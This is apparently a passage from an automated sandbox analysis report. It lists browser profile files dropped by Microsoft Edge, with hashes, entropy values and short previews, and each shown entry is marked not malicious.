                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.......X..g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2
                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:[]
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):20480
                                                                                                                                                            Entropy (8bit):0.6852315298663104
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:TLiOUOq0afDdWec9sJEpMl741miI7J5fc:TOOUzDbg39pMldc
                                                                                                                                                            MD5:19F8A237057D855585E293B39C348D63
                                                                                                                                                            SHA1:6DFC800D2C67A332B72884BDDEDE8A231EAEB35F
                                                                                                                                                            SHA-256:86E8C808D16056DAFA4449DE639D0C5F372B654C319516D5FC598DDD7FC4045E
                                                                                                                                                            SHA-512:FFD7FDF11BC4C78963D8420DE2E1BDCC611ADB93FE5F9D094BBE1C79D1E1A4D0CD3A95EF60760A6BFB719170DBD0DE1929AB28D0268E7A02B489E0F84E71078B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):13725
                                                                                                                                                            Entropy (8bit):5.124100185492223
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:sVmoJ9pQTryZiuaba4uypnNJk3aYjY5pOK8Gpj+FeJYQwHt+dl1f:sV7LAJu4NJk3QpUjQwYx
                                                                                                                                                            MD5:6E4F6A1DDC38A73B9B1DFCFFFEC345B4
                                                                                                                                                            SHA1:09FBA3C675A4CE417EF7CD3C89781014B57A6A3A
                                                                                                                                                            SHA-256:61B76C4721C16712EBF4B3CC3D5546D72A7B9E534B64DEF96CEF5D3AFE3023F0
                                                                                                                                                            SHA-512:D4E2897ED81412C153E92FDDE4C7C65CE3312FE88A36945A3966FEFCF292D78CEA5527BF26CD8F76592D395927A016A2B385B4E5F012374B92CB39381D6937B3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380674698994767","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):33
                                                                                                                                                            Entropy (8bit):4.051821770808046
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:YVXADAEvTLSJ:Y9AcEvHSJ
                                                                                                                                                            MD5:2B432FEF211C69C745ACA86DE4F8E4AB
                                                                                                                                                            SHA1:4B92DA8D4C0188CF2409500ADCD2200444A82FCC
                                                                                                                                                            SHA-256:42B55D126D1E640B1ED7A6BDCB9A46C81DF461FA7E131F4F8C7108C2C61C14DE
                                                                                                                                                            SHA-512:948502DE4DC89A7E9D2E1660451FCD0F44FD3816072924A44F145D821D0363233CC92A377DBA3A0A9F849E3C17B1893070025C369C8120083A622D025FE1EACF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"preferred_apps":[],"version":1}
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):34462
                                                                                                                                                            Entropy (8bit):5.558701456590119
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:TOhlEhpWPdBfq38F1+UoAYDCx9Tuqh0VfUC9xbog/OV+F7Ilrw/pQDdKp3tuR:TOhlEhpWPdBfq3u1jaH1IO/pauty
                                                                                                                                                            MD5:742EA671A3705EE09904218D2E4B51E5
                                                                                                                                                            SHA1:644C10C785935458C159564C459337FD00D4FA61
                                                                                                                                                            SHA-256:FFB6E2457C6ED9863E641322222157EE85E10733CEE3F9FB49D4A7FB3C48298A
                                                                                                                                                            SHA-512:072316A3006CF08589F2475AF8B237ED6E0BDC838B1E949FA18213C58BB237F0D28A1A958FF6BB4DE4491A3629778B08242EB8B7FBD49EA4F549A09328D556C5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380674698346217","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380674698346217","location":5,"ma
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):16
                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:MANIFEST-000001.
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2394
                                                                                                                                                            Entropy (8bit):5.811106020584051
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:F2xc5NmycncmoDCRORpllg2hEKfRHgldCRORpllg2hR7y3FCRORpllg2hEFRHgk9:F2embMrd6KfBkrdn2Prd6FBlrd3B7
                                                                                                                                                            MD5:B9A2B1C5B545631723AB453C42F53104
                                                                                                                                                            SHA1:D34B4666D22A66C0DF8F83D93C36556C46451A49
                                                                                                                                                            SHA-256:4FE023E655B0EFB2BD93D617A3444C61F2AFA72EDB8AF8CC0B34246DE1ACA4EF
                                                                                                                                                            SHA-512:C196CAC1C502D58A5696DA2995F7AFBB67DC37D92CBF2CF0766AC6038E5332980259746644E327AA277B4F0CA580D434395F63E4BD62588B3937600F5C83487D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2.Gx..................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true .(.0.8......@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x.................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmpt
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):16
                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:MANIFEST-000001.
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):297
                                                                                                                                                            Entropy (8bit):5.188351009524501
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:iO/p+K1wkn23oH+TcwtE/a252KLl9pqIS39+q2Pwkn23oH+TcwtE/a2ZIFUv:7/p+VfYeb8xLzpLi+vYfYeb8J2FUv
                                                                                                                                                            MD5:6C860AA29DBA5A28386B1927801BBF1D
                                                                                                                                                            SHA1:64D5E55E2BD807FA22EECA9DE00FDAB9D62E1B21
                                                                                                                                                            SHA-256:ADF3499155407E09812A3650EABC7A1BDABCE1FAAA29A5B158D42D3A3EDB7F68
                                                                                                                                                            SHA-512:094991A2F80B4BB968F733E9E7D969D4CC667E4D063D132A9149214DE5B0AA2C805EB858637CE9CEC3DA6A52E7E1733C98DC1D3D4554E96D5E24C626F9F7A569
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:05:08.868 14bc Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2025/01/06-17:05:08.892 14bc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:OpenPGP Secret Key
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):41
                                                                                                                                                            Entropy (8bit):4.704993772857998
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):115273
                                                                                                                                                            Entropy (8bit):5.578450319014886
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:sU906yxPXfOxr1lhCe1nL/ImL/rBZXJCjPXNtrbXMTQ1TI6h:B9LyxPXfOxr1lMe1nL/5L/TXJ6zQ0z
                                                                                                                                                            MD5:4DA99BB4F1571B3DA0079C469C972669
                                                                                                                                                            SHA1:66AC86833CE703DC8F3654375F8F01671C0D235E
                                                                                                                                                            SHA-256:A13FE8EFC1A91F176B69335595BAB1AAF9B489A978D08582F9436A65262B1C81
                                                                                                                                                            SHA-512:81A54B3DF059828430A42854A18C543F5F2021FB062095EDE73BB9E5F99245385E65B66CE28F2E134E6BCFC46C851748C143B80C2B449492DAEE25CF74A9A671
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):189841
                                                                                                                                                            Entropy (8bit):6.389336214674335
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:Jl+cQJiTDirpyhawsPWIEQtL/RX+UKbPM4johhlYnP/E:PhawTIE+L/h+NYA9U
                                                                                                                                                            MD5:D65B43E91C51AFF17AE186738DAB0149
                                                                                                                                                            SHA1:AE605C7B1226F64C004765C2CD01030557F9D081
                                                                                                                                                            SHA-256:8658A492122D830C5FE9316E61DDFB75D43D154DAA487BB735C5FE926E841E2C
                                                                                                                                                            SHA-512:0F515165A911316006DA01E9DE777C445C141EAAD0587FB81509A69B3763B45EDC21B1B2E67D1F4703226F63364F7D40D7192210BC881C8B65787E710540DF72
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:0\r..m..........rSG.....0....Lp.................;\......*8........,T.8..`,.....L`.....,T...`......L`......Rcf.K<....exports...Rc.2ix....module....Rc^......define....Rb..?.....amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H........Q....].{...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true.a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da.....`...,T.`.`z.....L`..........a............a.........Dr8..............
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):24
                                                                                                                                                            Entropy (8bit):2.1431558784658327
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:m+l:m
                                                                                                                                                            MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                            SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                            SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                            SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:0\r..m..................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):72
                                                                                                                                                            Entropy (8bit):3.565412423760729
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:FvzX00Xl/l7n/lxEstllTIXx:NXjEsuB
                                                                                                                                                            MD5:7C982094C637BB3615B4807BB1CB4264
                                                                                                                                                            SHA1:9B8A8B0F24D549E5FABB299B2ACE1C3A891D91C2
                                                                                                                                                            SHA-256:3C0081CB12875F3C26654C2CADC78B80A3F84D807DADF3FB5954499A7D94759B
                                                                                                                                                            SHA-512:F80D40B7592D7AC79C0784C9C25B0A3D91BDC2B1A4BD004094C3C2CD898709CB5232073899ABDF65E61F1074BFB6922F1D5F73AA2105C57B263BCBF30E6EFB25
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:@...0Jt>oy retne.........................X....,...................../.
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):72
                                                                                                                                                            Entropy (8bit):3.565412423760729
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:FvzX00Xl/l7n/lxEstllTIXx:NXjEsuB
                                                                                                                                                            MD5:7C982094C637BB3615B4807BB1CB4264
                                                                                                                                                            SHA1:9B8A8B0F24D549E5FABB299B2ACE1C3A891D91C2
                                                                                                                                                            SHA-256:3C0081CB12875F3C26654C2CADC78B80A3F84D807DADF3FB5954499A7D94759B
                                                                                                                                                            SHA-512:F80D40B7592D7AC79C0784C9C25B0A3D91BDC2B1A4BD004094C3C2CD898709CB5232073899ABDF65E61F1074BFB6922F1D5F73AA2105C57B263BCBF30E6EFB25
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:@...0Jt>oy retne.........................X....,...................../.
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):72
                                                                                                                                                            Entropy (8bit):3.565412423760729
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:FvzX00Xl/l7n/lxEstllTIXx:NXjEsuB
                                                                                                                                                            MD5:7C982094C637BB3615B4807BB1CB4264
                                                                                                                                                            SHA1:9B8A8B0F24D549E5FABB299B2ACE1C3A891D91C2
                                                                                                                                                            SHA-256:3C0081CB12875F3C26654C2CADC78B80A3F84D807DADF3FB5954499A7D94759B
                                                                                                                                                            SHA-512:F80D40B7592D7AC79C0784C9C25B0A3D91BDC2B1A4BD004094C3C2CD898709CB5232073899ABDF65E61F1074BFB6922F1D5F73AA2105C57B263BCBF30E6EFB25
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:@...0Jt>oy retne.........................X....,...................../.
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):6139
                                                                                                                                                            Entropy (8bit):3.3888908088335694
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:cc9XmI0sorZH9Xp+mt+VijwLl9iSrl1LQyn6LSYQkjARAMAH8Alkgs4NC:cEmIQd9Xp+YKicLl9iSrlpTnrYQNgm
                                                                                                                                                            MD5:33A0805E50BEDCF97B244766CCB7B72F
                                                                                                                                                            SHA1:03DA3830BD190EDC8614141E9B912FE4B2D0EC2B
                                                                                                                                                            SHA-256:18230CD853BD97B907C1856652BB05F17A1AEAABAA9E63D71FBAAEB0E5B577AA
                                                                                                                                                            SHA-512:C9B2DE4E4D03C64BEDD80A8AF2758E66CBE5F349EAB47E4A9014E16541AED10AB9367497C4D6ED0DE3F4E3BCDA3217E70B6ADD95DB52B45AC7E50411F2DC4809
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................&f.................&f................!Q.b................next-map-id.1.Cnamespace-a258241b_0a3a_4fe7_a6d6_b133ebce50c0-https://ntp.msn.com/.0..pj.................map-0-shd_sweeper.,{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.1.s.w.-.c.c.-.c.a.l.f.e.e.d.i.c.,.c.-.p.r.g.-.m.s.n.-.s.b.i.d.m.,.p.n.p.w.x.e.x.p.i.r.e.6.0.,.b.i.n.g._.v.2._.s.c.o.p.e.,.p.r.g.-.1.s.w.-.s.a.g.e.i.m.a.n.n.i.2.c.,.p.r.g.-.1.s.w.-.c.-.r.p.d.l.a.u.n.c.h.,.1.s.-.w.p.o.-.p.r.1.-.c.t.t.u.,.p.r.g.-.f.i.n.-.c.l.e.f.t.r.a.,.r.o.u.t.e.a.u.t.h.e.x.p.,.p.r.g.-.a.d.s.p.e.e.k.,.p.r.g.-.p.r.2.-.w.i.d.g.e.t.-.t.a.b.,.p.r.g.-.p.r.2.-.m.a.r.k.e.t.s.e.l.-.t.,.1.s.-.p.2.-.i.g.n.o.r.e.c.m.,.p.r.g.-.p.r.2.-.m.a.r.k.e.t.s.e.l.,.b.t.i.e.-.a.d.-.c.t.a.
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):322
                                                                                                                                                            Entropy (8bit):5.136978716412371
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:iO/zubq2Pwkn23oH+TcwtrQMxIFUtNWDZmwznZkwOwkn23oH+TcwtrQMFLJ:7/z8vYfYebCFUtNa/znZ5JfYebtJ
                                                                                                                                                            MD5:6E24668D978AC10972894753FFDFDA4C
                                                                                                                                                            SHA1:C3D99A2E577C1C1E93C88961F73E95F3EB8BB1CB
                                                                                                                                                            SHA-256:B9D700A6BD5AC1E7DC11CC04F5807489AFBF389C886CB371798580083A60ECAF
                                                                                                                                                            SHA-512:9C3C93E4E885DF9235F124E2BF069D77C20805A22880770CEF56078710A39EEE510B551594A8B354EA5405551C697709494504B65D2613637B0A10B06E65BDAD
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:04:59.188 10e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/01/06-17:04:59.189 10e0 Recovering log #3.2025/01/06-17:04:59.216 10e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1443
                                                                                                                                                            Entropy (8bit):3.823943655620176
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:3bzQPoeTUpsAF4unxCtLp3X2amEtG1Chq2OEZvVnPQKkOAM4:3bMQOUzFkLp2FEkChgaNnoHOp
                                                                                                                                                            MD5:3D1A2BF4F2933FD4073BDE920BCEB98D
                                                                                                                                                            SHA1:9C60A389ED6FD6E5164BDFA21D9EDAF4CC6B8A63
                                                                                                                                                            SHA-256:13C846CEEE557C73EDDA93F35C5E6F306FC905EF3C882DC6BE831BA3E9B5736C
                                                                                                                                                            SHA-512:26A95DACC6FA7981E713C470E82572FC9E652017DAA30E22814A7B4B1B38AD0AC7EF2D1449486D08A4795296326FA434A2BFFCD5217098848AB47C8CAA53BA08
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):20480
                                                                                                                                                            Entropy (8bit):0.44194574462308833
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                            MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                            SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                            SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                            SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):347
                                                                                                                                                            Entropy (8bit):5.151311210859333
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:iO/MOq2Pwkn23oH+Tcwt7Uh2ghZIFUtN6YXZmwz6YFkwOwkn23oH+Tcwt7Uh2gnd:7/9vYfYebIhHh2FUtNV/zH5JfYebIhHd
                                                                                                                                                            MD5:CAD30E8F294E5307A408DAA5853E479A
                                                                                                                                                            SHA1:E9E7267FFD443A30FBE9A16A84C3E2EF63E49890
                                                                                                                                                            SHA-256:8C423576E85517724C73C35989453C957AA9D4497B151E9EB15EDD78D07E6EA9
                                                                                                                                                            SHA-512:0E843D3D0A084FD50694F98C2B28C77B85D7C5BCE46045C6572C424DB02310E4903EDA1CD9A73867150B263AE6937686D9E7C899F2A90B9CC70E17003A2B9DC4
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:04:58.552 ab0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/06-17:04:58.553 ab0 Recovering log #3.2025/01/06-17:04:58.553 ab0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.01057775872642915
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsFl:/F
                                                                                                                                                            MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                            SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                            SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
